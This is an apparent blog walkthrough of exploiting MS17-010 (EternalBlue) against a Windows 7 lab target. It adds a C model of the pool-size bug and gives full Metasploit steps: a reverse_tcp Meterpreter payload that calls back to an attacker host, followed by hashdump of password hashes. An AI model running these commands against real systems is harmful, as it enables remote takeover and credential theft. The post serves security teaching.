MS17-010 remote overflow (CVE-2017-0143)

Vulnerability introduction

MS17-010 is a buffer overflow in the non-paged kernel pool, located in the kernel-mode function srv!SrvOs2FeaListToNt of the Windows SMBv1 driver (srv.sys) and reached while converting FEA (File Extended Attributes) lists.
srv!SrvOs2FeaListToNt converts an OS/2 FEA list sent by the client into an NT FEA list. Before copying, it calls srv!SrvOs2FeaListSizeToNt to compute the size of the converted list and allocates a pool buffer of that size. The size calculation is wrong: the function writes the number of bytes it actually walked back into the list's 32-bit cbList field with a 16-bit store, so the high word of the attacker-supplied cbList survives. The conversion loop then trusts the corrupted cbList and copies more entries than the allocation accounts for, overflowing the pool buffer.
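The size bug described above, as an added user-mode model (this is not code from the original post and not the srv.sys code itself): the two functions imitate the walk that srv!SrvOs2FeaListSizeToNt and srv!SrvOs2FeaListToNt perform over an OS/2 FEA list, with the structure layouts simplified and the list contents constructed for the demonstration. The declared cbList of 0x10000 and the 31 entries of 0x1000 bytes are assumptions chosen to make the arithmetic easy to follow, not the values the real exploit sends.

```c
/*
 * Added illustration of the MS17-010 size bug (not from the original post,
 * not Microsoft's code). Layouts are simplified; constants are assumptions.
 * Assumes a little-endian host, like the x86/x64 targets.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* OS/2 FEA list: 4-byte cbList (total size incl. header), then packed FEAs.
 * Each FEA: fEA(1) cbName(1) cbValue(2) name[cbName+1] value[cbValue]. */
#define FEALIST_HDR 4u
#define FEA_HDR     4u
/* NT FILE_FULL_EA_INFORMATION: NextEntryOffset(4) Flags(1) EaNameLength(1)
 * EaValueLength(2) name[cbName+1] value[cbValue]; entries 4-byte aligned. */
#define NTFEA_HDR   8u
#define ALIGN4(x)   (((x) + 3u) & ~3u)

static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static uint16_t rd16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }

/* Size of the OS/2 FEA entry at offset off, and of its NT counterpart. */
static uint32_t fea_size(const uint8_t *fl, uint32_t off) {
    return FEA_HDR + fl[off + 1] + 1u + rd16(fl + off + 2);
}
static uint32_t ntfea_size(const uint8_t *fl, uint32_t off) {
    return ALIGN4(NTFEA_HDR + fl[off + 1] + 1u + rd16(fl + off + 2));
}

/* Model of srv!SrvOs2FeaListSizeToNt: walk the entries that fit inside the
 * declared cbList, sum their NT sizes, and store the bytes actually walked
 * back into cbList. Returns the NT buffer size the caller will allocate. */
static uint32_t os2_fea_list_size_to_nt(uint8_t *fl, int fixed) {
    uint32_t cb = rd32(fl), off = FEALIST_HDR, nt = 0;
    while (off < cb) {
        uint32_t sz = fea_size(fl, off);
        if (off + sz > cb) break;            /* entry does not fit: stop here */
        nt += ntfea_size(fl, off);
        off += sz;
    }
    if (fixed) {
        memcpy(fl, &off, 4);                 /* correct: full 32-bit store */
    } else {
        uint16_t w = (uint16_t)off;          /* bug: 16-bit store, the high word */
        memcpy(fl, &w, 2);                   /* of the original cbList survives */
    }
    return nt;
}

/* Model of the copy loop in srv!SrvOs2FeaListToNt: converts every entry inside
 * the (possibly corrupted) cbList. Returns the NT bytes it tries to write. */
static uint32_t os2_fea_list_to_nt(const uint8_t *fl) {
    uint32_t cb = rd32(fl), off = FEALIST_HDR, written = 0;
    while (off < cb) {
        uint32_t sz = fea_size(fl, off);
        if (off + sz > cb) break;
        written += ntfea_size(fl, off);
        off += sz;
    }
    return written;
}

/* Constructed test data: a list whose header declares cbList = declared but
 * whose packet body actually carries 'entries' fixed-size FEAs (cbName = 0). */
static uint8_t *build_fea_list(uint32_t declared, uint32_t entries, uint16_t cb_value) {
    uint32_t sz = FEA_HDR + 1u + cb_value;
    uint8_t *fl = calloc(1, FEALIST_HDR + (size_t)entries * sz);
    if (!fl) { perror("calloc"); exit(1); }
    memcpy(fl, &declared, 4);
    for (uint32_t i = 0, off = FEALIST_HDR; i < entries; i++, off += sz) {
        fl[off] = 0; fl[off + 1] = 0;                 /* fEA, cbName */
        memcpy(fl + off + 2, &cb_value, 2);           /* cbValue */
        memset(fl + off + FEA_HDR + 1, 0x41, cb_value);
    }
    return fl;
}

/* Size pass followed by copy pass. Returns NT bytes copied minus NT bytes
 * allocated: a positive result is the pool overflow in bytes. */
long overflow_bytes(int fixed) {
    /* 31 entries of 0x1000 bytes each; only 15 fit under the declared 0x10000 */
    uint8_t *fl = build_fea_list(0x10000, 31, 0x1000 - FEA_HDR - 1);
    uint32_t alloc = os2_fea_list_size_to_nt(fl, fixed);
    uint32_t copied = os2_fea_list_to_nt(fl);
    free(fl);
    return (long)copied - (long)alloc;
}

int main(void) {
    printf("buggy size pass: copy exceeds allocation by %ld bytes\n", overflow_bytes(0));
    printf("fixed size pass: copy exceeds allocation by %ld bytes\n", overflow_bytes(1));
    return 0;
}
```

With the buggy store, the size pass stops after the 15 entries that fit under 0x10000 and allocates for them (15 * 0x1004 bytes), but the 16-bit write leaves cbList at 0x1F004 instead of 0xF004, so the copy pass converts all 31 entries into a buffer sized for 15. With the 32-bit store both passes agree and nothing is overrun.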

Lab environment

Here I use the lab range provided by Anjie.com.

Attacker machine   192.168.0.3
Windows 7 target   192.168.0.2

Exploit

Start by scanning the target with nmap:

nmap -sV -Pn 192.168.0.2

The target has ports 135, 139 and 445 open, and the service banners identify it as Windows 7. Port 445 (SMB) is the one the exploit needs.
Next start Metasploit:

msfconsole

In the Metasploit console, use search to list the modules related to MS17-010:

search ms17-010

This is a lab target, so we go straight to the EternalBlue exploit module. (The search also lists auxiliary/scanner/smb/smb_ms17_010; against a host you cannot afford to crash, run that check first, because the exploit can blue-screen the target if its kernel pool grooming fails.)

use exploit/windows/smb/ms17_010_eternalblue

Show the module options and set every option whose Required column is yes:

show options

Set the address of the target machine:

set RHOSTS 192.168.0.2

Next choose the payload, the shellcode that runs on the target after the exploit succeeds. Here we use a reverse TCP Meterpreter, which connects back from the target to our attacker machine:

set payload windows/x64/meterpreter/reverse_tcp

The payload has options of its own, so run show options again. LHOST, the address the target connects back to, is still unset; set it to the attacker machine:

set LHOST 192.168.0.3

With the configuration complete, run exploit (or its alias run) to launch the module:

run

A Meterpreter session is opened on the target host.

With a session open, the rest of this post looks at what Meterpreter can do once the exploit has landed.
Run sysinfo to view basic information about the target:

sysinfo

The help command lists the commands Meterpreter supports:

help

Finally, dump the password hashes of the target's local accounts with hashdump. This needs SYSTEM privileges; the EternalBlue module delivers its payload in kernel context, so the session already runs as SYSTEM and the command works directly:

hashdump

Summary

Another simple and fulfilling day!


Source: blog.csdn.net/p_utao/article/details/108394587